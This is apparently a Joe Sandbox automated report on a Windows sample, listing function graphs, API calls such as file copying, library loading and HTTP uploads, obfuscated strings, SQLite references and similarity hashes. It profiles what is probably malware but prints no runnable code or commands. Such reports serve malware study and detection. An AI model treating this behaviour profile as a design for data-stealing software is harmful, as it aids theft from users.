                                    control_flow_graph 4189 81e85f-81e956 call 890cfc call 818f5d * 2 call 82e8c7 call 82fa3b call 82e917 call 82fa3b call 82df41 * 5 4214 81e991-81e998 4189->4214 4215 81e958-81e96a call 86db91 4189->4215 4216 81e9a9-81e9cc 4214->4216 4217 81e99a 4214->4217 4215->4214 4224 81e96c-81e990 call 86dfe8 call 86db47 4215->4224 4220 81ea09-81ea10 4216->4220 4221 81e9ce-81e9e0 call 86db91 4216->4221 4219 81e99c-81e9a7 4217->4219 4219->4216 4219->4219 4225 81ea21-81ea5e call 82da74 4220->4225 4226 81ea12 4220->4226 4221->4220 4232 81e9e2-81ea08 call 86dfe8 call 86db47 4221->4232 4224->4214 4235 81ea60-81ea73 call 86db91 4225->4235 4236 81ea95-81ea9c 4225->4236 4227 81ea14-81ea1f 4226->4227 4227->4225 4227->4227 4232->4220 4235->4236 4248 81ea75-81ea94 call 82d50f call 86dfe8 call 86db47 4235->4248 4241 81eaad-81eb2f call 82da74 call 82bb72 call 82e917 call 82df41 call 82fec9 call 813174 call 82dd77 4236->4241 4242 81ea9e 4236->4242 4268 81eb35-81eb89 call 82fec9 call 813225 call 82dd77 CopyFileA 4241->4268 4269 81ec4a-81ec6a call 82fec9 call 813225 4241->4269 4243 81eaa0-81eaab 4242->4243 4243->4241 4243->4243 4248->4236 4268->4269 4282 81eb8f-81ebc5 4268->4282 4277 81ec6f-81ecb5 call 82dd77 call 82df41 * 2 4269->4277 4285 81ebc7-81ebda call 86db91 4282->4285 4286 81ebfc-81ec03 4282->4286 4285->4286 4296 81ebdc-81ebfb call 82d5ef call 86dfe8 call 86db47 4285->4296 4288 81ec05 4286->4288 4289 81ec14-81ec40 call 8183df 4286->4289 4292 81ec07-81ec12 4288->4292 4289->4269 4292->4289 4292->4292 4296->4286
                                    APIs
                                      • Part of subcall function 0082DF41: _Deallocate.LIBCONCRT ref: 0082DF50
                                      • Part of subcall function 0086DB91: EnterCriticalSection.KERNEL32(008B3CAC,?,74714EE0,?,0081416B,008B54D0,00000000), ref: 0086DB9C
                                      • Part of subcall function 0086DB91: LeaveCriticalSection.KERNEL32(008B3CAC,?,0081416B,008B54D0,00000000), ref: 0086DBD9
                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 0081EB81
                                      • Part of subcall function 0086DB47: EnterCriticalSection.KERNEL32(008B3CAC,69494B7C,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB51
                                      • Part of subcall function 0086DB47: LeaveCriticalSection.KERNEL32(008B3CAC,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB84
                                      • Part of subcall function 0086DB47: RtlWakeAllConditionVariable.NTDLL ref: 0086DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: BKZ$JOZ.$JOZ.$rYOB$rYOBBKZJOZ.
                                    • API String ID: 265086031-1704678390
                                    • Opcode ID: f8dcf11c2d1c08d92c303be5bbc43adba988d954e6bc96587cee4e0e208abeb9
                                    • Instruction ID: e48c025aeb62d36d7804ab67cb6e80fc1931e25f5dd366fb4d47321c6415c973
                                    • Opcode Fuzzy Hash: f8dcf11c2d1c08d92c303be5bbc43adba988d954e6bc96587cee4e0e208abeb9
                                    • Instruction Fuzzy Hash: A6C1ED30D00298DEDF15EBA8D946BEDBBB0FF15310F240199E556BB293DB701A89CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0082C2CA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • HttpSendRequestExA.WININET(?,?,00000000,00000000,00000000), ref: 0082C368
                                    • InternetWriteFile.WININET(?,?,?,?), ref: 0082C37D
                                    • InternetWriteFile.WININET(?,?,?,?), ref: 0082C388
                                    • InternetWriteFile.WININET(?,?,00000010,?), ref: 0082C395
                                    • HttpEndRequestA.WININET(?,00000000,00000000,00000000), ref: 0082C39E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileInternetWrite$HttpRequest$Send
                                    • String ID: (
                                    • API String ID: 2326806561-3887548279
                                    • Opcode ID: 6adcc676fc9437a4f415d3cd894a017d65e26cda789d429e7a1c4f7bb1340588
                                    • Instruction ID: 0399485c3a7f3f165d0fa27265029cd7dd67674e80217d715604711322aa9063
                                    • Opcode Fuzzy Hash: 6adcc676fc9437a4f415d3cd894a017d65e26cda789d429e7a1c4f7bb1340588
                                    • Instruction Fuzzy Hash: AD31E8B2D14219AFDF14DFA8DC85AEEBBB8FF48300F14842AE516E7241D6719945CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00834C21 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 294COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: -journal$-stmtjrnl$:memory:
                                    • API String ID: 4218353326-2512898500
                                    • Opcode ID: 5bb89e82f10f33b6889a9c587bde01ceee9f7dc03ad3ab9cfbf1ec9df60aea2e
                                    • Instruction ID: b788bfff11f515aab667391d42962b0daabb666231aad02865eea25a64beedfe
                                    • Opcode Fuzzy Hash: 5bb89e82f10f33b6889a9c587bde01ceee9f7dc03ad3ab9cfbf1ec9df60aea2e
                                    • Instruction Fuzzy Hash: B8B1AC71A007459FDB25DFA8C841AAABBF1FF88304F14982DE596E7742E735E901CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00883BF4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,0089E0E8), ref: 00883C5E
                                    • _free.LIBCMT ref: 00883C4C
                                      • Part of subcall function 00880123: RtlFreeHeap.NTDLL(00000000,00000000,?,0087DA9C), ref: 00880139
                                      • Part of subcall function 00880123: GetLastError.KERNEL32(?,?,0087DA9C), ref: 0088014B
                                    • _free.LIBCMT ref: 00883E18
                                    Strings
                                    • W. Europe Standard Time, xrefs: 00883CCD
                                    • W. Europe Daylight Time, xrefs: 00883CFC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                    • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                    • API String ID: 2155170405-986674615
                                    • Opcode ID: 342df62751a56809bc349fecf36a65ac2ac1c90ce6edf90776897cbc92897c27
                                    • Instruction ID: a94cdffeac152160a5ab0389dc89ce79d016b6f43f4382d0803833e33e82e63a
                                    • Opcode Fuzzy Hash: 342df62751a56809bc349fecf36a65ac2ac1c90ce6edf90776897cbc92897c27
                                    • Instruction Fuzzy Hash: D751D871900219ABDB14FF68DC829AEB7BCFF41724B15426AE460E7292EB709F44CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0084DCBF Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 448COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0084CC8A: _strlen.LIBCMT ref: 0084CCB1
                                    • _strlen.LIBCMT ref: 0084E07E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: $%s.%s$sqlite_subquery_%p_
                                    • API String ID: 4218353326-1950918665
                                    • Opcode ID: 20e5daca8c4eb7d5b2f3468c8b47d7b202d64f93e52b65fe091a63e66157f2af
                                    • Instruction ID: a1ba190f75cbe9e2b3ac81422c3090459425c9aed62f394b84639fcd98182ff2
                                    • Opcode Fuzzy Hash: 20e5daca8c4eb7d5b2f3468c8b47d7b202d64f93e52b65fe091a63e66157f2af
                                    • Instruction Fuzzy Hash: B2024A71E006199FDB24CFA8C880BAEB7F2FF98315F248569E415EB251D774AD42CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0082AA32 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 316COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0082A518: LoadLibraryA.KERNELBASE(008B5C78), ref: 0082A5B7
                                      • Part of subcall function 0082A518: GetProcAddress.KERNEL32(00000000,008B606C), ref: 0082A645
                                    • FreeLibrary.KERNELBASE ref: 0082AECC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: .$.$]]YA
                                    • API String ID: 145871493-2355798663
                                    • Opcode ID: 666d3697d7887dcaa674913faff708d49fdd82e2ab9f414c27fce8d53baa0915
                                    • Instruction ID: d621996cd92d4c23275414713f1524a43d30f228f7fbb647a8e055fc41e34bd0
                                    • Opcode Fuzzy Hash: 666d3697d7887dcaa674913faff708d49fdd82e2ab9f414c27fce8d53baa0915
                                    • Instruction Fuzzy Hash: 51D1AD70D002699FDF18EFA8E845BEDBBB1FF05310F1141A8E155EB292DB746A85CB12
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00822A28 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strlen.LIBCMT ref: 00822B2C
                                    • _strlen.LIBCMT ref: 00822B48
                                      • Part of subcall function 0086DB91: EnterCriticalSection.KERNEL32(008B3CAC,?,74714EE0,?,0081416B,008B54D0,00000000), ref: 0086DB9C
                                      • Part of subcall function 0086DB91: LeaveCriticalSection.KERNEL32(008B3CAC,?,0081416B,008B54D0,00000000), ref: 0086DBD9
                                      • Part of subcall function 0086DB47: EnterCriticalSection.KERNEL32(008B3CAC,69494B7C,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB51
                                      • Part of subcall function 0086DB47: LeaveCriticalSection.KERNEL32(008B3CAC,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB84
                                      • Part of subcall function 0086DB47: RtlWakeAllConditionVariable.NTDLL ref: 0086DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave_strlen$ConditionVariableWake
                                    • String ID: ~\AJ[MZ`OCK.
                                    • API String ID: 2310394193-2575923559
                                    • Opcode ID: 0eeba927002aeb6301489737fedefa3b806ec903cddaf6808c580b1eeaa58e08
                                    • Instruction ID: 716e8190317d302570cea977706f7e27ecb44db51d6dcec36a4083b8b1ef5a61
                                    • Opcode Fuzzy Hash: 0eeba927002aeb6301489737fedefa3b806ec903cddaf6808c580b1eeaa58e08
                                    • Instruction Fuzzy Hash: 0841F631E04664EADF11EBBCE4457ED7BB0FF56320F240049E042EB282CBB45985C752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00855D67 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • CopyFileW.KERNELBASE(?,?,@%#a,?,?,?,00856070,?,?,00000000,61232540), ref: 00855D77
                                    • GetLastError.KERNEL32(?,?,?,00856070,?,?,00000000,61232540), ref: 00855D8D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CopyErrorFileLast
                                    • String ID: @%#a
                                    • API String ID: 374144340-13247877
                                    • Opcode ID: 1ced3e28013f56d76ba8834c7ec9a8ace83f959389d93635fcad100c2a3ee0c2
                                    • Instruction ID: c3f9238f114c0b09b24f14a34191f72cb3fb83314cf7b3cac72e2ccdbe7ff369
                                    • Opcode Fuzzy Hash: 1ced3e28013f56d76ba8834c7ec9a8ace83f959389d93635fcad100c2a3ee0c2
                                    • Instruction Fuzzy Hash: C6E08C31608189FFDB019FA6DC08FAE7FBABB55349F18C06AB844C5150DA74D9449770
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088201C Relevance: 4.7, APIs: 3, Instructions: 177fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008817B1: GetConsoleCP.KERNEL32(00873AC2,00000000,00000001), ref: 008817F9
                                    • WriteFile.KERNELBASE(?,00000001,00000000,008B02C0,00000000,00000000,00000000,00000000,00000001,008B02C0,00000010,00873AC2,00000000,00000000,00000000), ref: 0088216D
                                    • GetLastError.KERNEL32(?,00000000,00000001), ref: 00882177
                                    • __dosmaperr.LIBCMT ref: 008821BC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                    • String ID:
                                    • API String ID: 251514795-0
                                    • Opcode ID: 191c2302a4588e8915eecbd5bfd81d80f6d69c69a864b3a7012c1c333f68f841
                                    • Instruction ID: 0ece97899b2e349c893a7d871f81c4cbf286b97c22a3ac889b208221b6640204
                                    • Opcode Fuzzy Hash: 191c2302a4588e8915eecbd5bfd81d80f6d69c69a864b3a7012c1c333f68f841
                                    • Instruction Fuzzy Hash: 0251C275A0051AAFDF11FBA8C889BEEBBB9FF49314F140151E500EB291D670EE42D762
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008887FD Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 00888806
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00888874
                                      • Part of subcall function 0088749B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0088165F,?,00000000,00000000), ref: 0088753D
                                      • Part of subcall function 0088255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0088838D,00000220,?,?,?,?,?,?,00873E8D,?), ref: 0088258E
                                    • _free.LIBCMT ref: 00888865
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                    • String ID:
                                    • API String ID: 2560199156-0
                                    • Opcode ID: 242115fa066e3e05ca42d83f03f2082d41dd11fff02b0af872598367c13eefef
                                    • Instruction ID: 348dd0cb3a822533549fe4262cc094042d799c5b23f071c3225ef16ef2e2bc08
                                    • Opcode Fuzzy Hash: 242115fa066e3e05ca42d83f03f2082d41dd11fff02b0af872598367c13eefef
                                    • Instruction Fuzzy Hash: B901A2A2A05615BF2721B6BB1C8DC7B696DFEC2FA43980139B914D6101EF61DD0183B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008810E3 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00881011,?,008B0260,0000000C,008810C3,?,?,?), ref: 00881139
                                    • GetLastError.KERNEL32(?,00881011,?,008B0260,0000000C,008810C3,?,?,?), ref: 00881143
                                    • __dosmaperr.LIBCMT ref: 0088116E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                    • String ID:
                                    • API String ID: 490808831-0
                                    • Opcode ID: bcc08352efbc8f0b3acf4479d25d2532283c378c11daea1c8b21882f3367db28
                                    • Instruction ID: e7db0fcfe97289775584b644d1a78056190ce30f96eecb74600eee2e7d353a41
                                    • Opcode Fuzzy Hash: bcc08352efbc8f0b3acf4479d25d2532283c378c11daea1c8b21882f3367db28
                                    • Instruction Fuzzy Hash: 4301483A70811016CA203278AC4E77DB75EFB92734F291619FA08C72C2DE248CC24391
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00833154 Relevance: 4.6, APIs: 3, Instructions: 55fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00833173
                                    • GetLastError.KERNEL32 ref: 0083317E
                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 008331A0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$ErrorLastPointerRead
                                    • String ID:
                                    • API String ID: 64821003-0
                                    • Opcode ID: 896368aa0f68c08a0ef8fa31a0e8e00f6bfbe4ecd8c922ae4697b4c81760de40
                                    • Instruction ID: 2ca26820f8125c0046d5e6db111e14fc3d4f4a8999ca0ddea3f5acaf9f6bce1a
                                    • Opcode Fuzzy Hash: 896368aa0f68c08a0ef8fa31a0e8e00f6bfbe4ecd8c922ae4697b4c81760de40
                                    • Instruction Fuzzy Hash: 7A015A32304209FBDB209FA9DC45F9F7BACFB857A4F244522F915DA290D670DA409BE0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081774B Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileMappingA.KERNEL32 ref: 0081777E
                                    • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,05F5E100), ref: 0081779B
                                    • CloseHandle.KERNEL32(?), ref: 008177AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleMappingView
                                    • String ID:
                                    • API String ID: 1187395538-0
                                    • Opcode ID: 81c199bd0bda15edcf6d17afb38113d14cb34848db9d6eae16bcbe138fed619a
                                    • Instruction ID: 35f27129279a121d0de00e23cff478273c3c2f5bf6ed59ebb47c6dc608688975
                                    • Opcode Fuzzy Hash: 81c199bd0bda15edcf6d17afb38113d14cb34848db9d6eae16bcbe138fed619a
                                    • Instruction Fuzzy Hash: E8110070908F419ED7328A269844AA3BAFCFFA9B65F108D6FE596C15D0E27098808B11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008115B3 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 40COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0085684E: FormatMessageA.KERNELBASE(00001300,00000000,?,00000000,?,00000000,00000000), ref: 00856864
                                    • LocalFree.KERNEL32(0000000F,unknown error,0000000D), ref: 008115F7
                                    • LocalFree.KERNEL32(?), ref: 00811610
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeLocal$FormatMessage
                                    • String ID: unknown error
                                    • API String ID: 803548167-3078798498
                                    • Opcode ID: 4bfba90a5a11840915c4dd47bd30f638b56d6c62582b25e9345743aa1c9b08b7
                                    • Instruction ID: ba360f0ab5572776c465f413146545c8575e46796a87e81a81ad80589f5db541
                                    • Opcode Fuzzy Hash: 4bfba90a5a11840915c4dd47bd30f638b56d6c62582b25e9345743aa1c9b08b7
                                    • Instruction Fuzzy Hash: F2018B70A00219EFDF10EF98C982AAEBBB9FF04345F000429B805E7251D7719E18CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008335EE Relevance: 3.1, APIs: 2, Instructions: 92fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00832F5C: GetVersionExA.KERNEL32(?), ref: 00832F80
                                    • CreateFileW.KERNELBASE(00000000,?,?,00000000,?,?,00000000), ref: 0083366D
                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 00833675
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile$Version
                                    • String ID:
                                    • API String ID: 1715692615-0
                                    • Opcode ID: 08a4968ec314e27b3fb959138fe550098fb3d5879fba7708f7c8a814f10a8f18
                                    • Instruction ID: e439fd5853f440fa73d3b2368bc4e7af6995246d89b2305c25a8ac82cad6b30a
                                    • Opcode Fuzzy Hash: 08a4968ec314e27b3fb959138fe550098fb3d5879fba7708f7c8a814f10a8f18
                                    • Instruction Fuzzy Hash: B721D2B2A00605BFDB10AF78CC42B9E77B1FF84720F144529F565E7281EB74CA409B90
